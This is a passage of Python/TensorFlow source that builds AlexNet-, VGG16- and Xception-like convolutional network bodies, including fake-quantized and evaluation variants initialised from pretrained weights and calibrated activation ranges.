                      convInit=Layer.ConstInit(preWeights[name]), convPadding='SAME',
                      biasInit=Layer.ConstInit(preBias[name]),
                      activation=Layer.ReLU,
                      fakeQuant=True, name=name, dtype=tf.float32)
        if pooled:
            kwargs.update(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                          poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(data, **kwargs)
        layers.append(net)
        data = _degraded(net)
    shape = net.output.shape
    flattened = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]])
    data = flattened
    for name in ('FC1', 'FC2'):
        net = Layer.FullyConnected(data, outputSize=4096,
                                   weightInit=Layer.ConstInit(preWeights[name]), wd=wd,
                                   biasInit=Layer.ConstInit(preBias[name]),
                                   activation=Layer.ReLU,
                                   fakeQuant=True, name=name, dtype=tf.float32)
        layers.append(net)
        data = _degraded(net)
    return net, layers
def AlexNetBody_Eval(network, images, preWeights, preBias, preMin, preMax):
    """Build the AlexNet tower for evaluation with recorded activation ranges.

    Layers are initialized from pretrained parameters and each layer has its
    (min, max) output range restored via setMinMax; activations flow between
    layers unmodified (the fake-quantization step is disabled here).

    Args:
        network: owning network; supplies the 'WeightDecay' hyperparameter.
        images: image batch with values in [0, 255].
        preWeights: dict, layer name -> pretrained kernel/weight tensor.
        preBias: dict, layer name -> pretrained bias tensor.
        preMin: dict, layer name -> recorded output minimum.
        preMax: dict, layer name -> recorded output maximum.

    Returns:
        (net, layers): the final FC layer object and the list of all layers
        in construction order.
    """
    wd = network._HParam['WeightDecay']
    layers = []
    data = tf.identity(images * (1 / 255.0), name='images_standardized')
    # (layer name, output channels, whether a 2x2 max-pool follows the conv)
    conv_plan = [('Conv1a', 96, False), ('Conv1b', 96, False),
                 ('Conv2a', 256, False), ('Conv2b', 256, True),
                 ('Conv3a', 384, False), ('Conv3b', 384, True),
                 ('Conv4a', 256, False), ('Conv4b', 256, True)]
    for name, channels, pooled in conv_plan:
        kwargs = dict(convChannels=channels,
                      convKernel=[3, 3], convStride=[1, 1], convWD=wd,
                      convInit=Layer.ConstInit(preWeights[name]), convPadding='SAME',
                      biasInit=Layer.ConstInit(preBias[name]),
                      activation=Layer.ReLU,
                      name=name, dtype=tf.float32)
        if pooled:
            kwargs.update(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                          poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(data, **kwargs)
        net.setMinMax(preMin[name], preMax[name])
        layers.append(net)
        data = net.output
    shape = net.output.shape
    flattened = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]])
    data = flattened
    for name in ('FC1', 'FC2'):
        net = Layer.FullyConnected(data, outputSize=4096,
                                   weightInit=Layer.ConstInit(preWeights[name]), wd=wd,
                                   biasInit=Layer.ConstInit(preBias[name]),
                                   activation=Layer.ReLU,
                                   name=name, dtype=tf.float32)
        net.setMinMax(preMin[name], preMax[name])
        layers.append(net)
        data = net.output
    return net, layers
def VGG16Body(network, images):
    """Build a VGG16-style convolutional body (no batch norm).

    Inputs are scaled from [0, 255] to [0, 1], pushed through thirteen 3x3
    convolutions (max-pooling after the last conv of stages 3, 4 and 5) and
    two 1024-wide fully-connected layers, all ReLU-activated.

    Args:
        network: owning network object; supplies `_HParam['WeightDecay']`.
        images: input image tensor with pixel values in [0, 255].

    Returns:
        (output tensor of the last FC layer, list of all constructed layers).
    """
    layers = []
    # Normalize pixel intensities into [0, 1].
    standardized = tf.identity(images / 255.0, name='images_standardized')

    # (layer name, output channels, apply 2x2 max-pool after this conv)
    conv_specs = [
        ('Conv1a', 32, False), ('Conv1b', 32, False),
        ('Conv2a', 64, False), ('Conv2b', 64, False),
        ('Conv3a', 128, False), ('Conv3b', 128, False), ('Conv3c', 128, True),
        ('Conv4a', 256, False), ('Conv4b', 256, False), ('Conv4c', 256, True),
        ('Conv5a', 256, False), ('Conv5b', 256, False), ('Conv5c', 256, True),
    ]

    feed = standardized
    for conv_name, channels, with_pool in conv_specs:
        pool_kwargs = {}
        if with_pool:
            pool_kwargs = dict(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                               poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(feed, convChannels=channels,
                           convKernel=[3, 3], convStride=[1, 1],
                           convWD=network._HParam['WeightDecay'],
                           convInit=Layer.XavierInit, convPadding='SAME',
                           bias=True, biasInit=Layer.ConstInit(0.0),
                           activation=Layer.ReLU,
                           name=conv_name, dtype=tf.float32, **pool_kwargs)
        layers.append(net)
        feed = net.output

    # Collapse the spatial feature map into a single vector per example.
    flattened = tf.reshape(net.output,
                           [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])

    for fc_name in ('FC1', 'FC2'):
        net = Layer.FullyConnected(feed if fc_name == 'FC2' else flattened,
                                   outputSize=1024, weightInit=Layer.XavierInit,
                                   wd=network._HParam['WeightDecay'],
                                   bias=True, biasInit=Layer.ConstInit(0.0),
                                   activation=Layer.ReLU,
                                   name=fc_name, dtype=tf.float32)
        layers.append(net)
        feed = net.output

    return net.output, layers
def VGG16BNBody(network, images):
    """Build a VGG16-style convolutional body with batch normalization.

    Same topology as ``VGG16Body`` — thirteen 3x3 convs with max-pooling at
    the end of stages 3, 4 and 5, then two 1024-wide FC layers — but every
    layer additionally enables batch norm (conv layers with epsilon 1e-8).

    Args:
        network: owning network object; supplies `_HParam['WeightDecay']`,
            `_step` and `_ifTest` for the batch-norm layers.
        images: input image tensor with pixel values in [0, 255].

    Returns:
        (output tensor of the last FC layer, list of all constructed layers).
    """
    layers = []
    # Normalize pixel intensities into [0, 1].
    standardized = tf.identity(images / 255.0, name='images_standardized')

    # (layer name, output channels, apply 2x2 max-pool after this conv)
    conv_specs = [
        ('Conv1a', 32, False), ('Conv1b', 32, False),
        ('Conv2a', 64, False), ('Conv2b', 64, False),
        ('Conv3a', 128, False), ('Conv3b', 128, False), ('Conv3c', 128, True),
        ('Conv4a', 256, False), ('Conv4b', 256, False), ('Conv4c', 256, True),
        ('Conv5a', 256, False), ('Conv5b', 256, False), ('Conv5c', 256, True),
    ]

    feed = standardized
    for conv_name, channels, with_pool in conv_specs:
        pool_kwargs = {}
        if with_pool:
            pool_kwargs = dict(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                               poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(feed, convChannels=channels,
                           convKernel=[3, 3], convStride=[1, 1],
                           convWD=network._HParam['WeightDecay'],
                           convInit=Layer.XavierInit, convPadding='SAME',
                           bias=True, biasInit=Layer.ConstInit(0.0),
                           bn=True, step=network._step, ifTest=network._ifTest,
                           epsilon=1e-8,
                           activation=Layer.ReLU,
                           name=conv_name, dtype=tf.float32, **pool_kwargs)
        layers.append(net)
        feed = net.output

    # Collapse the spatial feature map into a single vector per example.
    flattened = tf.reshape(net.output,
                           [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])

    for fc_name in ('FC1', 'FC2'):
        net = Layer.FullyConnected(feed if fc_name == 'FC2' else flattened,
                                   outputSize=1024, weightInit=Layer.XavierInit,
                                   wd=network._HParam['WeightDecay'],
                                   bias=True, biasInit=Layer.ConstInit(0.0),
                                   bn=True, step=network._step, ifTest=network._ifTest,
                                   activation=Layer.ReLU,
                                   name=fc_name, dtype=tf.float32)
        layers.append(net)
        feed = net.output

    return net.output, layers
def VGG16Body_Quant(network, images, preWeights, preBias):
    """Build a fake-quantized VGG16 body initialized from pretrained tensors.

    Same topology as ``VGG16Body`` (thirteen 3x3 convs, pooling after stages
    3/4/5, two 1024-wide FC layers), but every layer is created with
    ``fakeQuant=True``, weights/biases are initialized from the pretrained
    ``preWeights``/``preBias`` dictionaries, and each layer's activations are
    passed through ``fake_quant_with_min_max_vars`` before feeding the next
    layer (simulating quantized inference during training).

    Args:
        network: owning network object; supplies `_HParam['WeightDecay']`.
        images: input image tensor with pixel values in [0, 255].
        preWeights: dict mapping layer name -> pretrained weight array.
        preBias: dict mapping layer name -> pretrained bias array.

    Returns:
        (last FC layer object, list of all constructed layers).

    Fixes vs. the previous revision: `_outWrapper` computed an unused step
    size `s` and performed a dead `output = net.output` assignment that was
    immediately overwritten; both removed (no behavior change).
    """
    def _outWrapper(net):
        # Fake-quantize the layer output using the layer's calibrated
        # [_outMin, _outMax] range (maintained by the Layer objects).
        return fake_quant_with_min_max_vars(net.output, net._outMin, net._outMax,
                                            num_bits=FAKEBITS, narrow_range=False)

    layers = []
    # Normalize pixel intensities into [0, 1].
    standardized = tf.identity(images * (1 / 255.0), name='images_standardized')

    # (layer name, output channels, apply 2x2 max-pool after this conv)
    conv_specs = [
        ('Conv1a', 32, False), ('Conv1b', 32, False),
        ('Conv2a', 64, False), ('Conv2b', 64, False),
        ('Conv3a', 128, False), ('Conv3b', 128, False), ('Conv3c', 128, True),
        ('Conv4a', 256, False), ('Conv4b', 256, False), ('Conv4c', 256, True),
        ('Conv5a', 256, False), ('Conv5b', 256, False), ('Conv5c', 256, True),
    ]

    feed = standardized  # the first conv consumes the raw standardized input
    for conv_name, channels, with_pool in conv_specs:
        pool_kwargs = {}
        if with_pool:
            pool_kwargs = dict(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                               poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(feed, convChannels=channels,
                           convKernel=[3, 3], convStride=[1, 1],
                           convWD=network._HParam['WeightDecay'],
                           convInit=Layer.ConstInit(preWeights[conv_name]),
                           convPadding='SAME',
                           biasInit=Layer.ConstInit(preBias[conv_name]),
                           activation=Layer.ReLU,
                           fakeQuant=True, name=conv_name, dtype=tf.float32,
                           **pool_kwargs)
        layers.append(net)
        # Every subsequent layer consumes the fake-quantized activations.
        feed = _outWrapper(net)

    # Collapse the (quantized) spatial feature map into a vector per example.
    flattened = tf.reshape(feed,
                           [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])

    net = Layer.FullyConnected(flattened, outputSize=1024,
                               weightInit=Layer.ConstInit(preWeights['FC1']),
                               wd=network._HParam['WeightDecay'],
                               biasInit=Layer.ConstInit(preBias['FC1']),
                               activation=Layer.ReLU,
                               fakeQuant=True, name='FC1', dtype=tf.float32)
    layers.append(net)
    net = Layer.FullyConnected(_outWrapper(net), outputSize=1024,
                               weightInit=Layer.ConstInit(preWeights['FC2']),
                               wd=network._HParam['WeightDecay'],
                               biasInit=Layer.ConstInit(preBias['FC2']),
                               activation=Layer.ReLU,
                               fakeQuant=True, name='FC2', dtype=tf.float32)
    layers.append(net)
    return net, layers
def VGG16Body_Eval(network, images, preWeights, preBias, preMin, preMax):
    """Build a float-evaluation VGG16 body with pretrained weights and ranges.

    Same topology as ``VGG16Body`` (thirteen 3x3 convs, pooling after stages
    3/4/5, two 1024-wide FC layers). Each layer is initialized from the
    pretrained ``preWeights``/``preBias`` dictionaries and has its calibrated
    activation range installed via ``setMinMax(preMin[name], preMax[name])``.
    Unlike the `_Quant` variant, activations flow between layers unquantized.

    Args:
        network: owning network object; supplies `_HParam['WeightDecay']`.
        images: input image tensor with pixel values in [0, 255].
        preWeights: dict mapping layer name -> pretrained weight array.
        preBias: dict mapping layer name -> pretrained bias array.
        preMin: dict mapping layer name -> calibrated activation minimum.
        preMax: dict mapping layer name -> calibrated activation maximum.

    Returns:
        (last FC layer object, list of all constructed layers).

    Fixes vs. the previous revision: `_outWrapper` computed unused locals
    `a`, `b` and `s` before returning `net.output` unchanged; the dead code
    is removed (no behavior change).
    """
    def _outWrapper(net):
        # Quantization hook point: during evaluation the activations pass
        # through unchanged (fake quantization intentionally disabled here).
        return net.output

    layers = []
    # Normalize pixel intensities into [0, 1].
    standardized = tf.identity(images * (1 / 255.0), name='images_standardized')

    # (layer name, output channels, apply 2x2 max-pool after this conv)
    conv_specs = [
        ('Conv1a', 32, False), ('Conv1b', 32, False),
        ('Conv2a', 64, False), ('Conv2b', 64, False),
        ('Conv3a', 128, False), ('Conv3b', 128, False), ('Conv3c', 128, True),
        ('Conv4a', 256, False), ('Conv4b', 256, False), ('Conv4c', 256, True),
        ('Conv5a', 256, False), ('Conv5b', 256, False), ('Conv5c', 256, True),
    ]

    feed = standardized
    for conv_name, channels, with_pool in conv_specs:
        pool_kwargs = {}
        if with_pool:
            pool_kwargs = dict(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                               poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(feed, convChannels=channels,
                           convKernel=[3, 3], convStride=[1, 1],
                           convWD=network._HParam['WeightDecay'],
                           convInit=Layer.ConstInit(preWeights[conv_name]),
                           convPadding='SAME',
                           biasInit=Layer.ConstInit(preBias[conv_name]),
                           activation=Layer.ReLU,
                           name=conv_name, dtype=tf.float32, **pool_kwargs)
        # Install the calibrated activation range before the layer is used.
        net.setMinMax(preMin[conv_name], preMax[conv_name])
        layers.append(net)
        feed = _outWrapper(net)

    # Collapse the spatial feature map into a single vector per example.
    flattened = tf.reshape(feed,
                           [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])

    net = Layer.FullyConnected(flattened, outputSize=1024,
                               weightInit=Layer.ConstInit(preWeights['FC1']),
                               wd=network._HParam['WeightDecay'],
                               biasInit=Layer.ConstInit(preBias['FC1']),
                               activation=Layer.ReLU,
                               name='FC1', dtype=tf.float32)
    net.setMinMax(preMin['FC1'], preMax['FC1'])
    layers.append(net)
    net = Layer.FullyConnected(_outWrapper(net), outputSize=1024,
                               weightInit=Layer.ConstInit(preWeights['FC2']),
                               wd=network._HParam['WeightDecay'],
                               biasInit=Layer.ConstInit(preBias['FC2']),
                               activation=Layer.ReLU,
                               name='FC2', dtype=tf.float32)
    net.setMinMax(preMin['FC2'], preMax['FC2'])
    layers.append(net)
    return net, layers
# --- Legacy/experimental network bodies below; kept for reference only ---
def SmallNetBody(network, images):
    """Build a small residual-style convolutional body.

    Eight 3x3 conv layers with batch norm and ReLU (two of them joined by
    element-wise shortcut additions, three with stride 2 for downsampling),
    followed by one 1024-wide batch-normalized FC layer.

    Args:
        network: owning network object; supplies `_HParam['WeightDecay']`,
            `_step` and `_ifTest` for the batch-norm layers.
        images: input image tensor with pixel values in [0, 255].

    Returns:
        (output tensor of the FC layer, list of all constructed layers).
    """
    layers = []
    # Scale pixels from [0, 255] into [-1, 1].
    standardized = tf.identity(images / 127.5 - 1, name='images_standardized')

    def _conv(feed, channels, stride, conv_name, epsilon=1e-5):
        # One 3x3 conv + batch norm + ReLU block; records itself in `layers`.
        block = Layer.Conv2D(feed, convChannels=channels,
                             convKernel=[3, 3], convStride=[stride, stride],
                             convWD=network._HParam['WeightDecay'],
                             convInit=Layer.XavierInit, convPadding='SAME',
                             biasInit=Layer.ConstInit(0.0),
                             bn=True, step=network._step, ifTest=network._ifTest,
                             epsilon=epsilon,
                             activation=Layer.ReLU,
                             name=conv_name, dtype=tf.float32)
        layers.append(block)
        return block

    net = _conv(standardized, 64, 1, 'Conv1')
    net = _conv(net.output, 128, 1, 'Conv2')
    net = _conv(net.output, 128, 2, 'Conv3')
    shortcut = net.output
    net = _conv(net.output, 128, 1, 'Conv4')
    net = _conv(shortcut + net.output, 128, 2, 'Conv5')
    shortcut = net.output
    # NOTE(review): Conv6 uses epsilon=1e-8 while every other conv here uses
    # 1e-5 — preserved from the original; possibly unintentional, confirm.
    net = _conv(net.output, 128, 1, 'Conv6', epsilon=1e-8)
    net = _conv(shortcut + net.output, 128, 2, 'Conv7')
    net = _conv(net.output, 64, 1, 'Conv8')

    # Collapse the spatial feature map into a single vector per example.
    flattened = tf.reshape(net.output,
                           [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
    net = Layer.FullyConnected(flattened, outputSize=1024,
                               weightInit=Layer.XavierInit,
                               wd=network._HParam['WeightDecay'],
                               biasInit=Layer.ConstInit(0.0),
                               bn=True, step=network._step, ifTest=network._ifTest,
                               activation=Layer.ReLU,
                               name='FC1', dtype=tf.float32)
    layers.append(net)
    return net.output, layers
def SimpleNetBody(network, images):
    """Build an Xception-like CNN body from depthwise/separable convolutions.

    The network alternates separable-conv stages with 1x1 "shortcut" convs
    (max-pooled to match spatial size) that are added back in, ending with a
    global average pool.

    Args:
        network: model object supplying _HParam['WeightDecay'] plus the
            _step and _ifTest tensors consumed by the batch-norm layers.
        images: image batch with pixel values in [0, 255].

    Returns:
        (features, layers): the pooled feature tensor and the list of all
        Layer objects constructed along the way.
    """
    layers = []
    # Rescale pixels from [0, 255] to [-1, 1].
    standardized = tf.identity(images / 127.5 - 1, name='images_standardized')
    net = Layer.DepthwiseConv2D(standardized, convChannels=3*16, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='DepthwiseConv3x16', dtype=tf.float32)
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=96, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='SepConv96', dtype=tf.float32)
    layers.append(net)
    # Shortcut branch: 1x1 conv + 2x2 max-pool so shapes match the strided
    # main path below before the element-wise add.
    toadd = Layer.Conv2D(net.output, convChannels=192, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='SepConv192Shortcut', dtype=tf.float32)
    layers.append(toadd)
    net = Layer.SepConv2D(net.output, convChannels=192, \
        convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='SepConv192a', dtype=tf.float32)
    layers.append(net)
    # NOTE(review): no activation kwarg here — relies on Layer.SepConv2D's
    # default (presumably linear, as in pre-activation residual designs);
    # confirm that is intentional.
    net = Layer.SepConv2D(net.output, convChannels=192, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        name='SepConv192b', dtype=tf.float32)
    layers.append(net)
    added = toadd.output + net.output
    toadd = Layer.Conv2D(added, convChannels=384, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='SepConv384Shortcut', dtype=tf.float32)
    layers.append(toadd)
    net = Layer.Activation(added, activation=Layer.ReLU, name='ReLU384')
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=384, \
        convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='SepConv384a', dtype=tf.float32)
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=384, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='SepConv384b', dtype=tf.float32)
    layers.append(net)
    added = toadd.output + net.output
    toadd = Layer.Conv2D(added, convChannels=768, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='SepConv768Shortcut', dtype=tf.float32)
    layers.append(toadd)
    net = Layer.Activation(added, activation=Layer.ReLU, name='ReLU768')
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=768, \
        convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='SepConv768a', dtype=tf.float32)
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=768, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='SepConv768b', dtype=tf.float32)
    layers.append(net)
    added = toadd.output + net.output
    # NOTE(review): 'ReLU11024' looks like a typo for 'ReLU1024'; renaming
    # would break existing checkpoints, so it is left as-is.
    net = Layer.Activation(added, activation=Layer.ReLU, name='ReLU11024')
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=1024, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='SepConv1024', dtype=tf.float32)
    layers.append(net)
    net = Layer.GlobalAvgPool(net.output, name='GlobalAvgPool')
    layers.append(net)
    return net.output, layers
def ConcatNetBody(network, images):
    """Build a body whose stages concatenate their input with a bottleneck.

    Each stage is expand (1x1) -> depthwise (3x3) -> project (1x1, linear),
    with the stage input and projection channel-concatenated (axis=3). A
    stack of network._numMiddle pre-activation separable-conv residual
    blocks sits between the stages and the exit section.

    Args:
        network: model object supplying _HParam['WeightDecay'], _numMiddle,
            and the _step/_ifTest tensors used by the batch-norm layers.
        images: image batch with pixel values in [0, 255].

    Returns:
        (features, layers): the globally average-pooled feature tensor and
        the list of all Layer objects constructed.
    """
    layers = []
    # Rescale pixels from [0, 255] to [-1, 1].
    standardized = tf.identity(images / 127.5 - 1, name='images_standardized')
    # NOTE(review): unlike SimpleNetBody, no activation kwarg here — relies
    # on the Layer default; confirm intended.
    net = Layer.DepthwiseConv2D(standardized, convChannels=3*16, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        name='DepthwiseConv3x16', dtype=tf.float32)
    layers.append(net)
    # Stage 1: 48 -> (expand 96, depthwise, project 48) -> concat to 96.
    toconcat = Layer.Conv2D(net.output, convChannels=48, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage1_Conv_48a', dtype=tf.float32)
    layers.append(toconcat)
    net = Layer.Conv2D(toconcat.output, convChannels=96, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage1_Conv1x1_96', dtype=tf.float32)
    layers.append(net)
    net = Layer.DepthwiseConv2D(net.output, convChannels=96, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage1_DepthwiseConv96', dtype=tf.float32)
    layers.append(net)
    # Linear projection back down before the concat (bottleneck output).
    net = Layer.Conv2D(net.output, convChannels=48, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.Linear, \
        name='Stage1_Conv1x1_48b', dtype=tf.float32)
    layers.append(net)
    concated = tf.concat([toconcat.output, net.output], axis=3)
    # Stage 2: same pattern at 96/192 channels.
    toconcat = Layer.Conv2D(concated, convChannels=96, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage2_Conv_96a', dtype=tf.float32)
    layers.append(toconcat)
    net = Layer.Conv2D(toconcat.output, convChannels=192, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage2_Conv1x1_192', dtype=tf.float32)
    layers.append(net)
    net = Layer.DepthwiseConv2D(net.output, convChannels=192, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage2_DepthwiseConv192', dtype=tf.float32)
    layers.append(net)
    net = Layer.Conv2D(net.output, convChannels=96, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.Linear, \
        name='Stage2_Conv1x1_96b', dtype=tf.float32)
    layers.append(net)
    concated = tf.concat([toconcat.output, net.output], axis=3)
    # Stage 3: downsamples via max-pool on the stage entry conv.
    toconcat = Layer.Conv2D(concated, convChannels=192, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='Stage3_Conv_192a', dtype=tf.float32)
    layers.append(toconcat)
    net = Layer.Conv2D(toconcat.output, convChannels=384, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage3_Conv1x1_384', dtype=tf.float32)
    layers.append(net)
    net = Layer.DepthwiseConv2D(net.output, convChannels=384, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage3_DepthwiseConv384', dtype=tf.float32)
    layers.append(net)
    net = Layer.Conv2D(net.output, convChannels=192, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.Linear, \
        name='Stage3_Conv1x1_192b', dtype=tf.float32)
    layers.append(net)
    concated = tf.concat([toconcat.output, net.output], axis=3)
    # Stage 4: same pattern at 384/768 channels, again pooled at entry.
    toconcat = Layer.Conv2D(concated, convChannels=384, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='Stage4_Conv_384a', dtype=tf.float32)
    layers.append(toconcat)
    net = Layer.Conv2D(toconcat.output, convChannels=768, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
